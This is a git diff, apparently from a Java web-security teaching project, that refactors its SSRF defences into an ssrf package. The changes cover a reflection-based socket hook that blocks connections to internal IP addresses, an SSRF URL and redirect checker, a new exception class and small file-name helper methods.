diff --git a/src/main/java/org/joychou/security/SocketHookImpl.java b/src/main/java/org/joychou/security/SocketHookImpl.java
deleted file mode 100644
index ec41ebac..00000000
--- a/src/main/java/org/joychou/security/SocketHookImpl.java
+++ /dev/null
@@ -1,294 +0,0 @@
-package org.joychou.security;
-
-import java.io.IOException;
-import java.io.InputStream;
-import java.io.OutputStream;
-import java.lang.reflect.InvocationTargetException;
-import java.lang.reflect.Method;
-import java.net.*;
-import java.util.logging.Level;
-import java.util.logging.Logger;
-
-/**
- * @Author liergou
- * @Description socket impl
- * @Date 23:39 2020/4/2
- * @Param
- * @return
- **/
-public class SocketHookImpl extends SocketImpl implements SocketOptions
-{
-
-    private SocketImpl socketImpl = null;
-    private Method createImpl;
-    private Method connectHostImpl;
-    private Method connectInetAddressImpl;
-    private Method connectSocketAddressIMPL;
-    private Method bindImpl;
-    private Method listenImpl;
-    private Method acceptImpl;
-    private Method getInputStreamImpl;
-    private Method getOutputStreamImpl;
-    private Method availableImpl;
-    private Method closeImpl;
-    private Method shutdownInputImpl;
-    private Method shutdownOutputImpl;
-    private Method sendUrgentDataImpl;
-
-
-    /**
-     * @Author liergou
-     * @Description 初始化反射方法
-     * @Date 23:40 2020/4/2
-     * @Param [initSocketImpl]
-     * @return
-     **/
-    public SocketHookImpl(SocketImpl initSocketImpl) {
-
-        if ( initSocketImpl == null){
-            throw new RuntimeException("");
-            //TODO close hook
-        }
-
-        this.socketImpl = initSocketImpl;
-        final Class<?>  clazz = this.socketImpl.getClass();
-        Method[] allMethod = clazz.getDeclaredMethods();
-        createImpl = SocketHookUtils.findMethod( clazz,"create", new Class<?>[]{ boolean.class } );
-        connectHostImpl = SocketHookUtils.findMethod( clazz, "connect", new Class<?>[]{ String.class, int.class } );
-        connectInetAddressImpl = SocketHookUtils.findMethod( clazz, "connect", new Class<?>[]{ InetAddress.class, int.class } );
-        connectSocketAddressIMPL = SocketHookUtils.findMethod( clazz, "connect", new Class<?>[]{ SocketAddress.class, int.class } );
-        bindImpl = SocketHookUtils.findMethod( clazz, "bind", new Class<?>[]{ InetAddress.class, int.class } );
-        listenImpl = SocketHookUtils.findMethod( clazz, "listen", new Class<?>[]{ int.class } );
-        acceptImpl = SocketHookUtils.findMethod( clazz, "accept", new Class<?>[]{ SocketImpl.class } );
-        getInputStreamImpl = SocketHookUtils.findMethod( clazz, "getInputStream", new Class<?>[]{  } );
-        getOutputStreamImpl = SocketHookUtils.findMethod( clazz, "getOutputStream", new Class<?>[]{  } );
-        availableImpl = SocketHookUtils.findMethod( clazz, "available", new Class<?>[]{ } );
-        closeImpl = SocketHookUtils.findMethod( clazz, "close", new Class<?>[]{ } );
-        shutdownInputImpl = SocketHookUtils.findMethod( clazz, "shutdownInput", new Class<?>[]{ } );
-        shutdownOutputImpl = SocketHookUtils.findMethod( clazz, "shutdownOutput", new Class<?>[]{ } );
-        sendUrgentDataImpl = SocketHookUtils.findMethod( clazz, "sendUrgantData", new Class<?>[]{ int.class } );
-    }
-
-
-    /**
-     * socket base method impl
-     */
-    @Override
-    protected void create(boolean stream) throws IOException {
-            try
-            {
-                this.createImpl.invoke( this.socketImpl, stream);
-            }
-            catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex)
-            {
-                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
-            }
-
-    }
-
-    @Override
-    protected void connect(String host, int port) throws IOException {
-        Logger.getLogger(SocketHookImpl.class.getName()).log(Level.INFO, "host=" + host + ",port=" + port );
-
-            try
-            {
-                this.connectHostImpl.invoke( this.socketImpl, host, port);
-            }
-            catch (IllegalAccessException | InvocationTargetException | IllegalArgumentException ex)
-            {
-                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
-            }
-
-    }
-
-
-    @Override
-    protected void connect(InetAddress address, int port) throws IOException {
-            Logger.getLogger(SocketHookImpl.class.getName()).log(Level.INFO, "InetAddress=" + address.toString());
-
-            //start check SSRF
-            if(SSRFChecker.isInnerIp(SSRFChecker.getIpFromStr(address.toString()))){
-                throw new RuntimeException("Socket SSRF check failed. InetAddress:"+address.toString());
-            }
-            try
-            {
-                this.connectInetAddressImpl.invoke( this.socketImpl, address, port);
-            }
-            catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex)
-            {
-                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
-            }
-    }
-
-    @Override
-    protected void connect(SocketAddress address, int timeout) throws IOException {
-            Logger.getLogger(SocketHookImpl.class.getName()).log(Level.INFO, "SocketAddress=" + address.toString());
-            //start check SSRF
-            if(SSRFChecker.isInnerIp(SSRFChecker.getIpFromStr(address.toString()))){
-                throw new RuntimeException("Socket SSRF check failed. SocketAddress:"+address.toString());
-            }
-
-            try
-            {
-                this.connectSocketAddressIMPL.invoke( this.socketImpl, address, timeout);
-            }
-            catch (IllegalAccessException | InvocationTargetException | IllegalArgumentException ex)
-            {
-                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
-            }
-    }
-
-    @Override
-    protected void bind(InetAddress host, int port) throws IOException {
-            try
-            {
-                this.bindImpl.invoke( this.socketImpl, host, port);
-            }
-            catch (IllegalAccessException | InvocationTargetException | IllegalArgumentException ex)
-            {
-                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
-            }
-    }
-
-    @Override
-    protected void listen(int backlog) throws IOException {
-
-            try
-            {
-                this.listenImpl.invoke( this.socketImpl, backlog);
-            }
-            catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex)
-            {
-                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
-            }
-    }
-
-    @Override
-    protected void accept(SocketImpl s) throws IOException {
-
-            try
-            {
-                this.acceptImpl.invoke( this.socketImpl, s);
-            }
-            catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex)
-            {
-                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
-            }
-    }
-
-    @Override
-    protected InputStream getInputStream() throws IOException {
-        InputStream inStream = null;
-
-            try
-            {
-                inStream = (InputStream)this.getInputStreamImpl.invoke( this.socketImpl);
-            }
-            catch ( ClassCastException | InvocationTargetException | IllegalArgumentException | IllegalAccessException ex )
-            {
-                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
-            }
-
-        return inStream;
-    }
-
-    @Override
-    protected OutputStream getOutputStream() throws IOException {
-        OutputStream outStream = null;
-
-            try
-            {
-                outStream = (OutputStream)this.getOutputStreamImpl.invoke( this.socketImpl);
-            }
-            catch ( ClassCastException | IllegalArgumentException | IllegalAccessException | InvocationTargetException ex )
-            {
-                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
-            }
-
-        return outStream;
-    }
-
-    @Override
-    protected int available() throws IOException {
-        int result = -1;
-
-            try
-            {
-                result = (Integer)this.availableImpl.invoke( this.socketImpl);
-            }
-            catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex)
-            {
-                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
-            }
-
-        return result;
-    }
-
-    @Override
-    protected void close() throws IOException {
-            try
-            {
-                this.closeImpl.invoke( this.socketImpl);
-            }
-            catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex)
-            {
-                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
-            }
-    }
-
-    @Override
-    protected void shutdownInput() throws IOException {
-        try
-        {
-            this.shutdownInputImpl.invoke( this.socketImpl);
-        }
-        catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex)
-        {
-            Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
-        }
-
-    }
-
-    @Override
-    protected void shutdownOutput() throws IOException {
-        try
-        {
-            this.shutdownOutputImpl.invoke( this.socketImpl);
-        }
-        catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex)
-        {
-            Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
-        }
-
-    }
-
-    @Override
-    protected void sendUrgentData(int data) throws IOException {
-            try
-            {
-                this.sendUrgentDataImpl.invoke( this.socketImpl, data);
-            }
-            catch (IllegalAccessException | InvocationTargetException | IllegalArgumentException ex)
-            {
-                Logger.getLogger(SocketHookImpl.class.getName()).log(Level.SEVERE, null, ex);
-            }
-    }
-
-    public void setOption(int optID, Object value) throws SocketException {
-        if ( null != this.socketImpl )
-        {
-            this.socketImpl.setOption( optID, value );
-        }
-    }
-
-    public Object getOption(int optID) throws SocketException {
-        return this.socketImpl.getOption( optID );
-    }
-
-    /**
-     * dont impl other child method now
-     * dont sure where will use it
-     **/
-
-
-}
diff --git a/src/main/java/org/joychou/security/SocketHookUtils.java b/src/main/java/org/joychou/security/SocketHookUtils.java
deleted file mode 100644
index 75d48707..00000000
--- a/src/main/java/org/joychou/security/SocketHookUtils.java
+++ /dev/null
@@ -1,29 +0,0 @@
-package org.joychou.security;
-
-import java.lang.reflect.Method;
-
-public class SocketHookUtils {
-
-    /**
-     * @Author liergou
-     * @Description 轮询父类查找反射方法
-     * @Date 1:43 2020/4/4
-     * @Param [inputClazz, findName, args]
-     * @return java.lang.reflect.Method
-     **/
-    public static Method findMethod(Class<?> inputClazz, String findName ,Class<?>[] args){
-        Class<?> temp=inputClazz;
-        Method tmpMethod = null;
-        while(temp!=null){
-            try{
-                tmpMethod = temp.getDeclaredMethod(findName,args);
-                tmpMethod.setAccessible(true);
-                return tmpMethod;
-            }catch (NoSuchMethodException e){
-                temp=temp.getSuperclass();
-            }
-        }
-        return null;
-    }
-
-}
diff --git a/src/main/java/org/joychou/security/SSRFChecker.java b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
similarity index 77%
rename from src/main/java/org/joychou/security/SSRFChecker.java
rename to src/main/java/org/joychou/security/ssrf/SSRFChecker.java
index ef393074..32373aff 100644
--- a/src/main/java/org/joychou/security/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
@@ -1,25 +1,24 @@
-package org.joychou.security;
+package org.joychou.security.ssrf;
 
 import java.net.HttpURLConnection;
 import java.net.InetAddress;
 import java.net.URI;
 import java.net.URL;
 import java.util.ArrayList;
-import java.util.regex.Matcher;
-import java.util.regex.Pattern;
 
+import org.apache.commons.lang.StringUtils;
 import org.apache.commons.net.util.SubnetUtils;
 import org.joychou.config.WebConfig;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
-class SSRFChecker {
+
+public class SSRFChecker {
 
     private static Logger logger = LoggerFactory.getLogger(SSRFChecker.class);
-    private final static Pattern IP_PATTERN = Pattern.compile("((25[0-5]|2[0-4]\\d|[01]?\\d\\d?)\\.){3}(25[0-5]|2[0-4]\\d|[01]?\\d\\d?)");
 
-    static boolean checkURLFckSSRF(String url) {
-        if (null == url){
+    public static boolean checkURLFckSSRF(String url) {
+        if (null == url) {
             return false;
         }
 
@@ -37,7 +36,7 @@ static boolean checkURLFckSSRF(String url) {
                 return true;
             }
             for (String ssrfSafeDomain : ssrfSafeDomains) {
-                if(host.endsWith("." + ssrfSafeDomain)) {
+                if (host.endsWith("." + ssrfSafeDomain)) {
                     return true;
                 }
             }
@@ -53,20 +52,20 @@ static boolean checkURLFckSSRF(String url) {
      * url只允许https或者http，并且设置默认连接超时时间。
      * 该修复方案会主动请求重定向后的链接。最好用Hook方式获取到所有url后，进行判断，代码待续…
      *
-     * @param url check的url
+     * @param url        check的url
      * @param checkTimes 设置重定向检测的最大次数，建议设置为10次
      * @return 安全返回true，危险返回false
      */
-    static boolean checkSSRF(String url, int checkTimes) {
+    public static boolean checkSSRF(String url, int checkTimes) {
 
         HttpURLConnection connection;
-        int connectTime = 5*1000;  // 设置连接超时时间5s
+        int connectTime = 5 * 1000;  // 设置连接超时时间5s
         int i = 1;
         String finalUrl = url;
         try {
             do {
                 // 判断当前请求的URL是否是内网ip
-                if (isInnerIPByUrl(finalUrl)) {
+                if (isInternalIpByUrl(finalUrl)) {
                     logger.error("[-] SSRF check failed. Dangerous url: " + finalUrl);
                     return false;  // 内网ip直接return，非内网ip继续判断是否有重定向
                 }
@@ -78,14 +77,14 @@ static boolean checkSSRF(String url, int checkTimes) {
                 //connection.setRequestMethod("GET");
                 connection.connect(); // send dns request
                 int responseCode = connection.getResponseCode(); // 发起网络请求
-                if (responseCode >= 300 && responseCode <=307 && responseCode != 304 && responseCode != 306) {
+                if (responseCode >= 300 && responseCode <= 307 && responseCode != 304 && responseCode != 306) {
                     String redirectedUrl = connection.getHeaderField("Location");
                     if (null == redirectedUrl)
                         break;
                     finalUrl = redirectedUrl;
                     i += 1;  // 重定向次数加1
                     logger.info("redirected url: " + finalUrl);
-                    if(i == checkTimes) {
+                    if (i == checkTimes) {
                         return false;
                     }
                 } else
@@ -104,18 +103,19 @@ static boolean checkSSRF(String url, int checkTimes) {
      *
      * @return 如果是内网IP，返回true；非内网IP，返回false。
      */
-     static boolean isInnerIPByUrl(String url) {
+    public static boolean isInternalIpByUrl(String url) {
+
         String host = url2host(url);
         if (host.equals("")) {
             return true; // 异常URL当成内网IP等非法URL处理
         }
 
         String ip = host2ip(host);
-        if(ip.equals("")){
+        if (ip.equals("")) {
             return true; // 如果域名转换为IP异常，则认为是非法URL
         }
 
-        return isInnerIp(ip);
+        return isInternalIp(ip);
     }
 
 
@@ -125,14 +125,18 @@ static boolean isInnerIPByUrl(String url) {
      * @param strIP ip字符串
      * @return 如果是内网ip，返回true，否则返回false。
      */
-     static boolean isInnerIp(String strIP){
-
-        ArrayList<String> blackSubnets= WebConfig.getSsrfBlockIps();
+    static boolean isInternalIp(String strIP) {
+        if (StringUtils.isEmpty(strIP)) {
+            logger.error("[-] SSRF check failed. IP is empty. " + strIP);
+            return true;
+        }
 
-        for (String subnet: blackSubnets) {
+        ArrayList<String> blackSubnets = WebConfig.getSsrfBlockIps();
+        blackSubnets.add("10.0.0.0/8");
+        for (String subnet : blackSubnets) {
             SubnetUtils utils = new SubnetUtils(subnet);
             if (utils.getInfo().isInRange(strIP)) {
-                logger.error("[-] SSRF check failed. Inner Ip: " + strIP);
+                logger.error("[-] SSRF check failed. Internal IP: " + strIP);
                 return true;
             }
         }
@@ -153,8 +157,7 @@ private static String host2ip(String host) {
         try {
             InetAddress IpAddress = InetAddress.getByName(host); //  send dns request
             return IpAddress.getHostAddress();
-        }
-        catch (Exception e) {
+        } catch (Exception e) {
             return "";
         }
     }
@@ -168,7 +171,7 @@ private static String url2host(String url) {
         try {
             // 使用URI，而非URL，防止被绕过。
             URI u = new URI(url);
-            if (!url.startsWith("http://") && ! url.startsWith("https://")) {
+            if (!url.startsWith("http://") && !url.startsWith("https://")) {
                 return "";
             }
 
@@ -180,13 +183,4 @@ private static String url2host(String url) {
 
     }
 
-    /**
-     * 匹配ip
-     * @return
-     */
-     static String getIpFromStr(String ipStr){
-        Matcher matcher = IP_PATTERN.matcher(ipStr);
-        System.out.println(matcher.find());
-        return matcher.group();
-    }
 }
diff --git a/src/main/java/org/joychou/security/ssrf/SSRFException.java b/src/main/java/org/joychou/security/ssrf/SSRFException.java
new file mode 100644
index 00000000..b27a970f
--- /dev/null
+++ b/src/main/java/org/joychou/security/ssrf/SSRFException.java
@@ -0,0 +1,15 @@
+package org.joychou.security.ssrf;
+
+
+/**
+ * SSRFException
+ *
+ * @author JoyChou @2020-04-04
+ */
+class SSRFException extends RuntimeException {
+
+    SSRFException(String s) {
+        super(s);
+    }
+
+}
diff --git a/src/main/java/org/joychou/security/SocketHook.java b/src/main/java/org/joychou/security/ssrf/SocketHook.java
similarity index 59%
rename from src/main/java/org/joychou/security/SocketHook.java
rename to src/main/java/org/joychou/security/ssrf/SocketHook.java
index 359e33f3..92b8f496 100644
--- a/src/main/java/org/joychou/security/SocketHook.java
+++ b/src/main/java/org/joychou/security/ssrf/SocketHook.java
@@ -1,16 +1,18 @@
-package org.joychou.security;
+package org.joychou.security.ssrf;
 
 import java.io.IOException;
 import java.net.Socket;
 import java.net.SocketException;
 
+
 /**
- * @Author liergou
- * @Description Socket hook开关自如
- * @Date 2:12 2020/4/4
- **/
-class SocketHook {
-    static void startHook() throws NoSuchFieldException, IOException {
+ * Socket Hook switch
+ *
+ * @author liergou @ 2020-04-04 02:12
+ */
+public class SocketHook {
+
+    public static void startHook() throws NoSuchFieldException, IOException {
         SocketHookFactory.initSocket();
         SocketHookFactory.setHook(true);
         try{
@@ -19,7 +21,7 @@ static void startHook() throws NoSuchFieldException, IOException {
         }
     }
 
-    static void stopHook(){
+    public static void stopHook(){
         SocketHookFactory.setHook(false);
     }
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/security/ssrf/SocketHookFactory.java b/src/main/java/org/joychou/security/ssrf/SocketHookFactory.java
new file mode 100644
index 00000000..51a278b7
--- /dev/null
+++ b/src/main/java/org/joychou/security/ssrf/SocketHookFactory.java
@@ -0,0 +1,87 @@
+package org.joychou.security.ssrf;
+
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+
+import java.io.IOException;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationTargetException;
+import java.net.Socket;
+import java.net.SocketImpl;
+import java.net.SocketImplFactory;
+
+
+/**
+ * socket factory impl
+ *
+ * @author liergou @ 2020-04-03 23:41
+ */
+public class SocketHookFactory implements SocketImplFactory {
+
+
+    private static Boolean isHook = false;
+    private static Constructor socketConstructor = null;
+    private final Logger logger = LoggerFactory.getLogger(this.getClass());
+
+    /**
+     * @param set hook switch
+     */
+    static void setHook(Boolean set) {
+        isHook = set;
+    }
+
+
+    /**
+     * initSocket
+     */
+    static void initSocket() {
+        if (socketConstructor != null) {
+            return;
+        }
+
+        Socket socket = new Socket();
+        try {
+            Field implField = Socket.class.getDeclaredField("impl");
+            implField.setAccessible(true);
+            Class<?> clazz = implField.get(socket).getClass();
+            SocketHookImpl.initSocketImpl(clazz);
+            socketConstructor = clazz.getDeclaredConstructor();
+            socketConstructor.setAccessible(true);
+        } catch (NoSuchFieldException | IllegalAccessException | NoSuchMethodException e) {
+            throw new SSRFException("SocketHookFactory init failed!");
+        }
+
+        try {
+            socket.close();
+        } catch (IOException ignored) {
+
+        }
+    }
+
+
+    public SocketImpl createSocketImpl() {
+
+        if (isHook) {
+            try {
+                return new SocketHookImpl(socketConstructor);
+            } catch (Exception e) {
+                logger.error("Socket hook failed!");
+                try {
+                    return (SocketImpl) socketConstructor.newInstance();
+                } catch (InstantiationException | IllegalAccessException | InvocationTargetException ex) {
+                    logger.error(ex.toString());
+                }
+            }
+        } else {
+            try {
+                return (SocketImpl) socketConstructor.newInstance();
+            } catch (InstantiationException | IllegalAccessException | InvocationTargetException e) {
+                logger.error(e.toString());
+            }
+        }
+
+        return null;
+    }
+}
diff --git a/src/main/java/org/joychou/security/ssrf/SocketHookImpl.java b/src/main/java/org/joychou/security/ssrf/SocketHookImpl.java
new file mode 100644
index 00000000..c3b9c28d
--- /dev/null
+++ b/src/main/java/org/joychou/security/ssrf/SocketHookImpl.java
@@ -0,0 +1,270 @@
+package org.joychou.security.ssrf;
+
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.InvocationTargetException;
+import java.lang.reflect.Method;
+import java.net.*;
+
+
+/**
+ * Socket impl
+ *
+ * @author liergou @ 2020-04-02 23:39
+ */
+public class SocketHookImpl extends SocketImpl implements SocketOptions {
+
+    private static Boolean isInit = false;
+    static private SocketImpl socketImpl = null;
+    static private Method createImpl;
+    static private Method connectHostImpl;
+    static private Method connectInetAddressImpl;
+    static private Method connectSocketAddressImpl;
+    static private Method bindImpl;
+    static private Method listenImpl;
+    static private Method acceptImpl;
+    static private Method getInputStreamImpl;
+    static private Method getOutputStreamImpl;
+    static private Method availableImpl;
+    static private Method closeImpl;
+    static private Method shutdownInputImpl;
+    static private Method shutdownOutputImpl;
+    static private Method sendUrgentDataImpl;
+
+    private final Logger logger = LoggerFactory.getLogger(this.getClass());
+
+
+    SocketHookImpl(Constructor socketConstructor) throws IllegalAccessException,
+            InvocationTargetException, InstantiationException {
+        socketImpl = (SocketImpl) socketConstructor.newInstance();
+    }
+
+
+    /**
+     * Init reflect method.
+     *
+     * @author liergou
+     */
+    static void initSocketImpl(Class<?> initSocketImpl) {
+
+        if (initSocketImpl == null) {
+            SocketHookFactory.setHook(false);
+            throw new RuntimeException("InitSocketImpl failed! Hook stopped!");
+        }
+
+        if (!isInit) {
+            //
+            createImpl = SocketHookUtils.findMethod(initSocketImpl, "create", new Class<?>[]{boolean.class});
+            connectHostImpl = SocketHookUtils.findMethod(initSocketImpl, "connect", new Class<?>[]{String.class, int.class});
+            connectInetAddressImpl = SocketHookUtils.findMethod(initSocketImpl, "connect", new Class<?>[]{InetAddress.class, int.class});
+            connectSocketAddressImpl = SocketHookUtils.findMethod(initSocketImpl, "connect", new Class<?>[]{SocketAddress.class, int.class});
+            bindImpl = SocketHookUtils.findMethod(initSocketImpl, "bind", new Class<?>[]{InetAddress.class, int.class});
+            listenImpl = SocketHookUtils.findMethod(initSocketImpl, "listen", new Class<?>[]{int.class});
+            acceptImpl = SocketHookUtils.findMethod(initSocketImpl, "accept", new Class<?>[]{SocketImpl.class});
+            getInputStreamImpl = SocketHookUtils.findMethod(initSocketImpl, "getInputStream", new Class<?>[]{});
+            getOutputStreamImpl = SocketHookUtils.findMethod(initSocketImpl, "getOutputStream", new Class<?>[]{});
+            availableImpl = SocketHookUtils.findMethod(initSocketImpl, "available", new Class<?>[]{});
+            closeImpl = SocketHookUtils.findMethod(initSocketImpl, "close", new Class<?>[]{});
+            shutdownInputImpl = SocketHookUtils.findMethod(initSocketImpl, "shutdownInput", new Class<?>[]{});
+            shutdownOutputImpl = SocketHookUtils.findMethod(initSocketImpl, "shutdownOutput", new Class<?>[]{});
+            sendUrgentDataImpl = SocketHookUtils.findMethod(initSocketImpl, "sendUrgantData", new Class<?>[]{int.class});
+            isInit = true;
+        }
+    }
+
+
+    /**
+     * socket base method impl
+     */
+    @Override
+    protected void create(boolean stream) throws IOException {
+        try {
+            createImpl.invoke(socketImpl, stream);
+        } catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex) {
+            logger.error(ex.toString());
+        }
+
+    }
+
+
+    @Override
+    protected void connect(String host, int port) throws IOException {
+        logger.info("host: " + host + "\tport: " + port);
+        try {
+            connectHostImpl.invoke(socketImpl, host, port);
+        } catch (IllegalAccessException | InvocationTargetException | IllegalArgumentException ex) {
+            logger.error(ex.toString());
+        }
+
+    }
+
+
+    @Override
+    protected void connect(InetAddress address, int port) throws IOException {
+
+        logger.info("InetAddress: " + address.toString());
+
+        try {
+            if (SSRFChecker.isInternalIp(address.getHostAddress())) {
+                throw new RuntimeException("Socket SSRF check failed. InetAddress:" + address.toString());
+            }
+            connectInetAddressImpl.invoke(socketImpl, address, port);
+        } catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex) {
+            logger.error(ex.toString());
+        }
+    }
+
+    @Override
+    protected void connect(SocketAddress address, int timeout) throws IOException {
+
+        // convert SocketAddress to InetSocketAddress
+        InetSocketAddress addr = (InetSocketAddress) address;
+
+        String ip = addr.getAddress().getHostAddress();
+        String host = addr.getHostName();
+        logger.info(String.format("[+]SocketAddress address's Hostname: %s IP: %s", host, ip));
+
+        try {
+            if (SSRFChecker.isInternalIp(ip)) {
+                throw new SSRFException(String.format("[-] SSRF check failed. Hostname: %s IP: %s", host, ip));
+            }
+            connectSocketAddressImpl.invoke(socketImpl, address, timeout);
+        } catch (IllegalAccessException | IllegalArgumentException |
+                InvocationTargetException ex) {
+            logger.error(ex.toString());
+        }
+
+    }
+
+    @Override
+    protected void bind(InetAddress host, int port) throws IOException {
+        try {
+            bindImpl.invoke(socketImpl, host, port);
+        } catch (IllegalAccessException | InvocationTargetException | IllegalArgumentException ex) {
+            logger.error(ex.toString());
+        }
+    }
+
+    @Override
+    protected void listen(int backlog) {
+
+        try {
+            listenImpl.invoke(socketImpl, backlog);
+        } catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex) {
+            logger.error(ex.toString());
+        }
+    }
+
+    @Override
+    protected void accept(SocketImpl s) throws IOException {
+
+        try {
+            acceptImpl.invoke(socketImpl, s);
+        } catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex) {
+            logger.error(ex.toString());
+        }
+    }
+
+    @Override
+    protected InputStream getInputStream() throws IOException {
+        InputStream inStream = null;
+
+        try {
+            inStream = (InputStream) getInputStreamImpl.invoke(socketImpl);
+        } catch (ClassCastException | InvocationTargetException |
+                IllegalArgumentException | IllegalAccessException ex) {
+            logger.error(ex.toString());
+        }
+
+        return inStream;
+    }
+
+    @Override
+    protected OutputStream getOutputStream() throws IOException {
+        OutputStream outStream = null;
+
+        try {
+            outStream = (OutputStream) getOutputStreamImpl.invoke(socketImpl);
+        } catch (ClassCastException | IllegalArgumentException |
+                IllegalAccessException | InvocationTargetException ex) {
+            logger.error(ex.toString());
+        }
+
+        return outStream;
+    }
+
+    @Override
+    protected int available() throws IOException {
+
+        int result = -1;
+
+        try {
+            result = (Integer) availableImpl.invoke(socketImpl);
+        } catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex) {
+            logger.error(ex.toString());
+        }
+
+        return result;
+    }
+
+    @Override
+    protected void close() throws IOException {
+        try {
+            closeImpl.invoke(socketImpl);
+        } catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex) {
+            logger.error(ex.toString());
+        }
+    }
+
+    @Override
+    protected void shutdownInput() throws IOException {
+        try {
+            shutdownInputImpl.invoke(socketImpl);
+        } catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex) {
+            logger.error(ex.toString());
+        }
+
+    }
+
+    @Override
+    protected void shutdownOutput() throws IOException {
+        try {
+            shutdownOutputImpl.invoke(socketImpl);
+        } catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex) {
+            logger.error(ex.toString());
+        }
+
+    }
+
+    @Override
+    protected void sendUrgentData(int data) throws IOException {
+        try {
+            sendUrgentDataImpl.invoke(socketImpl, data);
+        } catch (IllegalAccessException | InvocationTargetException | IllegalArgumentException ex) {
+            logger.error(ex.toString());
+        }
+    }
+
+    public void setOption(int optID, Object value) throws SocketException {
+        if (null != socketImpl) {
+            socketImpl.setOption(optID, value);
+        }
+    }
+
+    public Object getOption(int optID) throws SocketException {
+        return socketImpl.getOption(optID);
+    }
+
+    /*
+     * Dont impl other child method now. Don't be sure where will use it.
+     *
+     */
+
+
+}
diff --git a/src/main/java/org/joychou/security/ssrf/SocketHookUtils.java b/src/main/java/org/joychou/security/ssrf/SocketHookUtils.java
new file mode 100644
index 00000000..b94b82d9
--- /dev/null
+++ b/src/main/java/org/joychou/security/ssrf/SocketHookUtils.java
@@ -0,0 +1,28 @@
+package org.joychou.security.ssrf;
+
+import java.lang.reflect.Method;
+
+class SocketHookUtils {
+
+    /**
+     * Poll the parent class to find the reflection method.
+     *
+     * @author liergou @2020-04-04 01:43
+     */
+    static Method findMethod(Class<?> inputClazz, String findName, Class<?>[] args) {
+
+        Class<?> temp = inputClazz;
+
+        while (temp != null) {
+            try {
+                Method tmpMethod = temp.getDeclaredMethod(findName, args);
+                tmpMethod.setAccessible(true);
+                return tmpMethod;
+            } catch (NoSuchMethodException e) {
+                temp = temp.getSuperclass();
+            }
+        }
+        return null;
+    }
+
+}
diff --git a/src/main/java/org/joychou/util/WebUtils.java b/src/main/java/org/joychou/util/WebUtils.java
index b0a59bc1..7cc16e84 100644
--- a/src/main/java/org/joychou/util/WebUtils.java
+++ b/src/main/java/org/joychou/util/WebUtils.java
@@ -2,9 +2,11 @@
 
 import javax.servlet.http.Cookie;
 import javax.servlet.http.HttpServletRequest;
+import java.io.File;
 import java.io.IOException;
 import java.io.InputStream;
 
+import com.google.common.base.Preconditions;
 import org.springframework.web.util.HtmlUtils;
 
 public class WebUtils {
@@ -30,4 +32,18 @@ public static String getCookieValueByName(HttpServletRequest request, String coo
     public static String json2Jsonp(String callback, String jsonStr) {
         return HtmlUtils.htmlEscape(callback) + "(" + jsonStr + ")";
     }
+
+    public static String getFileExtension(String fullName) {
+        Preconditions.checkNotNull(fullName);
+        String fileName = (new File(fullName)).getName();
+        int dotIndex = fileName.lastIndexOf('.');
+        return dotIndex == -1 ? "" : fileName.substring(dotIndex + 1);
+    }
+
+    public static String getNameWithoutExtension(String file) {
+        Preconditions.checkNotNull(file);
+        String fileName = (new File(file)).getName();
+        int dotIndex = fileName.lastIndexOf('.');
+        return dotIndex == -1 ? fileName : fileName.substring(0, dotIndex);
+    }
 }

From 2aa0b91a1689c341d3a09b93dd070c78bd2ef287 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 6 Apr 2020 20:47:42 +0800
Subject: [PATCH 079/108] bug fix

---
 .../java/org/joychou/controller/SSRF.java     | 258 +++++++-----------
 .../org/joychou/security/SecurityUtil.java    |   2 +-
 .../joychou/security/ssrf/SSRFChecker.java    |   1 -
 .../joychou/security/ssrf/SSRFException.java  |   2 +-
 .../org/joychou/security/ssrf/SocketHook.java |   2 +-
 .../security/ssrf/SocketHookFactory.java      |   7 +-
 .../joychou/security/ssrf/SocketHookImpl.java |  66 ++---
 .../security/ssrf/SocketHookUtils.java        |  17 +-
 src/main/java/org/joychou/util/HttpUtils.java | 189 +++++++++++++
 src/main/java/org/joychou/util/WebUtils.java  |   5 +
 src/main/resources/templates/index.html       |   2 +-
 11 files changed, 342 insertions(+), 209 deletions(-)
